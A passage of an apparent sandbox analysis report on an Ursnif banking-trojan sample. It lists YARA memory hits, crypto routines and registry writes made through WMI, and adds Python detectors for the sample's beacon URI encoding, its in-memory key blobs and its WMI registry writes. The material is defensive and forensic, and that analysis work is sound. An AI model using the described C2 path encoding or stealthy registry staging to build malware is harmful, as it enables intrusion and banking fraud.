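def recover_blob(path, prefix="/drew/"):
    """Drop the campaign prefix (assumed to be /drew/ here) and the file
    extension, join the path segments, and map _2B/_2F back to + and /."""
    if not path.startswith(prefix):
        return None
    body = path[len(prefix):]
    if body.rfind(".") > body.rfind("/"):   # extension sits on the last segment only
        body = body[:body.rfind(".")]
    joined = body.replace("/", "")          # a token may straddle a segment boundary (ZF_/2F above)
    for token, char in URI_TOKENS.items():
        joined = joined.replace(token, char)
    return joined


def looks_like_ursnif_beacon(path, prefix="/drew/"):
    """True when the path carries at least one substituted token and the
    recovered blob is pure base64 alphabet."""
    blob = recover_blob(path, prefix)
    if blob is None:
        return False
    raw = path[len(prefix):].replace("/", "")
    return any(t in raw for t in URI_TOKENS) and bool(B64_ALPHABET.match(blob))


def decode_blob(blob):
    """Restore base64 padding and decode; None if the length cannot be valid base64.
    The result is ciphertext, so only its length is of interest here."""
    if not blob or not B64_ALPHABET.match(blob) or len(blob) % 4 == 1:
        return None
    return base64.b64decode(blob + "=" * (-len(blob) % 4))


# Two request paths copied from the HTTP evidence above.
PAGE_URIS = [
    "/drew/wEnwCvgRr/tkjGrRWK504Gps4HB3Fh/a_2BgTA9pNLu5RTmMnf/cmF_2FoZExPeCfaavPGpw5/C4a_2B98FiRPO/vd2Nyn5c/h1bh48eCW9576sdvhYLet1i/wAsWnHJnYc/cKnuGYGL3HaarUE97/qNDbxnUrqa6o/sHAvWKK0ZF_/2FEfhnIyqYNHjo/0w_2F7ABHTCX38bGaal1i/N2IxD5P36ZAbXvHE/ihtoW7NXLZjCM45/tPYjxR5L6h/zPvdL.jlk",
    "/drew/wga5IeWF0fbDUBK30nf7o/j3uIOKqwUJ7BeRn9/LJzeE6KiaowWMEN/1rl19rIxVGb1taWDFn/bvY_2Bj1I/jdMAwzmFp0So0WDkYGB7/K3_2FBRRUiljGXL6kfm/xF0075RiTcM0CPYkqDi3rw/svrqsYheZV3ck/1VgFcLwV/R_2Be8zhkiZ2WSszO26Jh4p/C_2FhB5HDF/R0NzBeUEC158lMl7p/nVaFZKFRejW7/8Iglv9KSE21/tjMzYgrS/4.jlk",
]

if __name__ == "__main__":
    print(summarize(parse_alerts(SNORT_LINES)))
    # Constructed path: base64 "+/+/" after the substitution, split across two segments.
    for uri in PAGE_URIS + ["/drew/_2B_2F/_2B_2F.jlk", "/favicon.ico"]:
        data = decode_blob(recover_blob(uri))
        print(looks_like_ursnif_beacon(uri), uri[:40], None if data is None else len(data))
```

The favicon requests are left unflagged on purpose: they carry no substituted token, and on a real proxy log the flag should be combined with the per-SID counts rather than used alone, since an underscore followed by two hex digits occurs in legitimate paths as well.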

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif
Source: Yara match File source: 00000006.00000003.330162595.0000000004ABC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.392202470.0000000005AB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.411738935.00000000064A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.338066734.00000000038AC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.349294200.000000000536C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.437697839.00000205D155C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.349136332.000000000536C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.330265188.0000000004ABC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.343128725.0000000005568000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.339561457.00000000050BC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.338125787.00000000038AC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.338174961.00000000038AC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000003.438121484.0000014B5DD8C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.413542435.0000000005DE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.338136102.00000000038AC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.349238253.000000000536C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.333735051.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.330104762.0000000004ABC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.330149161.0000000004ABC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.339592221.00000000050BC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.349114643.000000000536C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.339580367.00000000050BC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.396945352.0000000004F58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.349219356.000000000536C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.338105591.00000000038AC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.323045956.0000000004CB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.339543632.00000000050BC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.334273561.00000000052B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.330131368.0000000004ABC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.339627226.00000000050BC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 5624, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: regsvr32.exe PID: 2944, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 5268, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 5784, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 5008, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 6944, type: MEMORYSTR

E-Banking Fraud:

Yara detected Ursnif
Source: Yara match File source: 00000006.00000003.330162595.0000000004ABC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.392202470.0000000005AB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.411738935.00000000064A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.338066734.00000000038AC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.349294200.000000000536C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.437697839.00000205D155C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.349136332.000000000536C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.330265188.0000000004ABC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.343128725.0000000005568000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.339561457.00000000050BC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.338125787.00000000038AC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.338174961.00000000038AC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000003.438121484.0000014B5DD8C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.413542435.0000000005DE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.338136102.00000000038AC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.349238253.000000000536C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.333735051.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.330104762.0000000004ABC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.330149161.0000000004ABC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.339592221.00000000050BC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.349114643.000000000536C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.339580367.00000000050BC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.396945352.0000000004F58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.349219356.000000000536C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.338105591.00000000038AC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.323045956.0000000004CB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.339543632.00000000050BC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.334273561.00000000052B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.330131368.0000000004ABC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.339627226.00000000050BC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 5624, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: regsvr32.exe PID: 2944, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 5268, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 5784, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 5008, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 6944, type: MEMORYSTR
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_017D4872 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError, 1_2_017D4872
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_02D44872 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError, 4_2_02D44872
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_04AA4872 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError, 5_2_04AA4872
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_00AC4872 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError, 6_2_00AC4872
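The CryptAcquireContextW, CryptImportKey, CryptSetKeyParam, CryptEncrypt/CryptDecrypt chain listed under Cryptography above and repeated here is found at the same function offset (xxxx4872) in each process the sample injects into. CryptImportKey consumes a key BLOB; when that BLOB is a PLAINTEXTKEYBLOB the raw key sits in process memory in a fixed layout (8-byte BLOBHEADER, DWORD key length, key bytes), which makes it carvable from a memory dump taken around the call. The following is an added example, not part of the report and not the sample's code; it assumes the sample imports a PLAINTEXTKEYBLOB (the report does not state the blob type), and the memory buffer it scans is constructed rather than taken from this analysis.

```python
"""Carve CryptoAPI PLAINTEXTKEYBLOB structures out of a memory buffer (added example)."""
import struct

# BLOBHEADER constants from wincrypt.h
PLAINTEXTKEYBLOB = 0x08
CUR_BLOB_VERSION = 0x02
ALG_NAMES = {
    0x6601: "CALG_DES", 0x6602: "CALG_RC2", 0x6603: "CALG_3DES",
    0x6801: "CALG_RC4",
    0x660E: "CALG_AES_128", 0x660F: "CALG_AES_192", 0x6610: "CALG_AES_256",
}
# Plausible key lengths per algorithm. RC2/RC4 are variable-length, so a
# heuristic range is used for them (assumption: 5..128 bytes).
KEY_LENGTHS = {
    0x6601: {8}, 0x6603: {24},
    0x660E: {16}, 0x660F: {24}, 0x6610: {32},
    0x6602: set(range(5, 129)), 0x6801: set(range(5, 129)),
}
HEADER = struct.Struct("<BBHI")   # bType, bVersion, reserved, aiKeyAlg
KEYLEN = struct.Struct("<I")      # DWORD key length that follows the header


def parse_plaintext_key_blob(buf, offset=0):
    """Parse one blob at offset; return (alg_name, key) or None if malformed."""
    if offset + HEADER.size + KEYLEN.size > len(buf):
        return None
    btype, bver, reserved, alg = HEADER.unpack_from(buf, offset)
    if btype != PLAINTEXTKEYBLOB or bver != CUR_BLOB_VERSION or reserved != 0:
        return None
    if alg not in ALG_NAMES:
        return None
    (klen,) = KEYLEN.unpack_from(buf, offset + HEADER.size)
    if klen not in KEY_LENGTHS[alg]:
        return None
    start = offset + HEADER.size + KEYLEN.size
    key = buf[start:start + klen]
    if len(key) != klen:
        return None
    return ALG_NAMES[alg], bytes(key)


def carve_plaintext_key_blobs(buf):
    """Scan every byte offset and return (offset, alg_name, key) for each well-formed blob."""
    hits = []
    for off in range(len(buf)):
        parsed = parse_plaintext_key_blob(buf, off)
        if parsed is not None:
            hits.append((off, parsed[0], parsed[1]))
    return hits


def build_plaintext_key_blob(alg, key):
    """Lay out a blob exactly as a caller hands it to CryptImportKey (used here to build test data)."""
    return HEADER.pack(PLAINTEXTKEYBLOB, CUR_BLOB_VERSION, 0, alg) + KEYLEN.pack(len(key)) + key


# Constructed buffer: zero padding, one AES-128 blob, trailing 0xff bytes. Not from the sample.
SAMPLE_KEY = bytes(range(0x10, 0x20))
SAMPLE_DUMP = b"\x00" * 37 + build_plaintext_key_blob(0x660E, SAMPLE_KEY) + b"\xff" * 11

if __name__ == "__main__":
    for off, alg, key in carve_plaintext_key_blobs(SAMPLE_DUMP):
        print(f"offset {off:#x}: {alg} key={key.hex()}")
```

When run against a real dump the candidate list should be checked against the CryptSetKeyParam arguments seen in the same trace (KP_MODE = 4 selects the cipher mode, KP_IV = 1 supplies the IV), since a matching header alone does not prove the bytes were ever imported.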

System Summary:

Writes or reads registry keys via WMI
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Writes registry values via WMI
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
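The StdRegProv calls listed above are how the sample writes its configuration and staged scripts into the registry without touching the Win32 registry API from its own process: the operation is an IWbemServices::ExecMethod against the StdRegProv class in the root\default namespace. In a live environment the write itself is carried out by the WMI provider host on the client's behalf, so a registry-event sensor attributes it to WmiPrvSE.exe rather than to loaddll32.exe, regsvr32.exe or rundll32.exe; the WMI operation record, which names the client process, is what ties the write back to the loader. The Python below is an added example and not part of this report: it parses operation strings of exactly the form shown above, separates StdRegProv writes from reads, and lists client images that perform writes. The records are constructed from the lines above, and the (image, operation) record shape, the allow-list of expected clients and the assumption that the Microsoft-Windows-WMI-Activity/Trace log yields the same operation strings are mine.

```python
"""Separate StdRegProv registry writes from reads in WMI operation records and
list client images that write to the registry through WMI.

Added example, not part of the Joe Sandbox report. Records are constructed to
mirror the report's "WMI Queries" lines; the (image, operation) record shape
and the allow-list of expected client images are assumptions."""
import re
from collections import Counter, defaultdict

# Operation strings have the shape:
#   IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
#   IWbemServices::ExecQuery  - root\cimv2   : SELECT ...
WMI_OP_RE = re.compile(
    r"IWbemServices::(?P<call>\w+)\s*-\s*(?P<namespace>[\w\\]+)\s*:\s*(?P<target>.+)$")
METHOD_RE = re.compile(r"^(?P<class>\w+)::(?P<method>\w+)\s*$")

# StdRegProv methods that modify the registry (the documented method set).
STDREGPROV_WRITE_METHODS = {
    "CreateKey", "DeleteKey", "DeleteValue", "SetBinaryValue", "SetDWORDValue",
    "SetQWORDValue", "SetStringValue", "SetExpandedStringValue",
    "SetMultiStringValue", "SetSecurityDescriptor",
}
# Images expected to drive StdRegProv (assumption; tune per environment).
EXPECTED_CLIENTS = {"powershell.exe", "wmic.exe", "wmiprvse.exe", "ccmexec.exe"}


def parse_wmi_operation(op):
    """Return call, namespace, class, method and is_write for one record, or None."""
    m = WMI_OP_RE.search(op)
    if not m:
        return None
    d = {"call": m["call"], "namespace": m["namespace"], "class": None,
         "method": None, "is_write": False}
    t = METHOD_RE.match(m["target"])
    if d["call"] == "ExecMethod" and t:
        d["class"], d["method"] = t["class"], t["method"]
        d["is_write"] = d["class"] == "StdRegProv" and d["method"] in STDREGPROV_WRITE_METHODS
    return d


def find_wmi_registry_writers(records):
    """records: iterable of (client_image_path, operation_string).
    Returns {image_basename: Counter(method -> count)} for unexpected writers;
    reads (Get*Value, EnumKey, ...) are ignored on purpose."""
    writers = defaultdict(Counter)
    for image, op in records:
        parsed = parse_wmi_operation(op)
        if not parsed or not parsed["is_write"]:
            continue
        name = image.rsplit("\\", 1)[-1].lower()
        if name not in EXPECTED_CLIENTS:
            writers[name][parsed["method"]] += 1
    return dict(writers)


# Constructed records modeled on the report's lines, plus two benign controls.
SAMPLE = [
    (r"C:\Windows\System32\loaddll32.exe", r"IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue"),
    (r"C:\Windows\System32\loaddll32.exe", r"IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue"),
    (r"C:\Windows\System32\loaddll32.exe", r"IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey"),
    (r"C:\Windows\SysWOW64\regsvr32.exe", r"IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue"),
    (r"C:\Windows\SysWOW64\rundll32.exe", r"IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue"),
    (r"C:\Windows\SysWOW64\rundll32.exe", r"IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue"),
    (r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", r"IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue"),
    (r"C:\Windows\System32\svchost.exe", r"IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process"),
]

if __name__ == "__main__":
    for image, methods in sorted(find_wmi_registry_writers(SAMPLE).items()):
        print(f"{image}: {dict(methods)}")
```

Run against the constructed records the function reports loaddll32.exe, regsvr32.exe and rundll32.exe as WMI registry writers and drops the PowerShell write and the svchost query. The GetStringValue and GetBinaryValue reads are deliberately not counted: reading configuration through StdRegProv is common, while a loader that creates keys and sets binary values through WMI is the signal worth paging on.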
Uses 32bit PE files
Source: status.dll Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Yara signature match
Source: 00000006.00000002.476168753.000000000069B000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_LNK_SuspiciousCommands date = 2018-09-18, author = Florian Roth, description = Detects LNK file with suspicious content, score =
Source: 00000021.00000002.386067444.00000121EDC9B000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_LNK_SuspiciousCommands date = 2018-09-18, author = Florian Roth, description = Detects LNK file with suspicious content, score =
Source: 00000005.00000003.463693625.000000000308F000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_LNK_SuspiciousCommands date = 2018-09-18, author = Florian Roth, description = Detects LNK file with suspicious content, score =
Detected potential crypto function
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_017D81DC 1_2_017D81DC
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_017D6C62 1_2_017D6C62
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_017D4EF3 1_2_017D4EF3
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_00FE0DF9 1_2_00FE0DF9
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_00FE0DF7 1_2_00FE0DF7
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_03B09314 1_2_03B09314
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_03B01FD5 1_2_03B01FD5
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_03B17FC6 1_2_03B17FC6
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_03B15E19 1_2_03B15E19
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_03B08572 1_2_03B08572
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_02D44EF3 4_2_02D44EF3
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_02D46C62 4_2_02D46C62
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_02D481DC 4_2_02D481DC
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_00960DF7 4_2_00960DF7
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_00960DF9 4_2_00960DF9
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_048E8572 4_2_048E8572
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_048F5E19 4_2_048F5E19
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_048F7FC6 4_2_048F7FC6
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_048E1FD5 4_2_048E1FD5
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_04903724 4_2_04903724
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_048E9314 4_2_048E9314
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_04AA4EF3 5_2_04AA4EF3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_04AA6C62 5_2_04AA6C62
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_04AA81DC 5_2_04AA81DC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_031C0DF9 5_2_031C0DF9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_031C0DF7 5_2_031C0DF7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_05918572 5_2_05918572
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_05911FD5 5_2_05911FD5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_05927FC6 5_2_05927FC6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_05933724 5_2_05933724
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_05925E19 5_2_05925E19
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_05919314 5_2_05919314
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_00AC4EF3 6_2_00AC4EF3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_00AC6C62 6_2_00AC6C62
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_00AC81DC 6_2_00AC81DC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_00999314 6_2_00999314
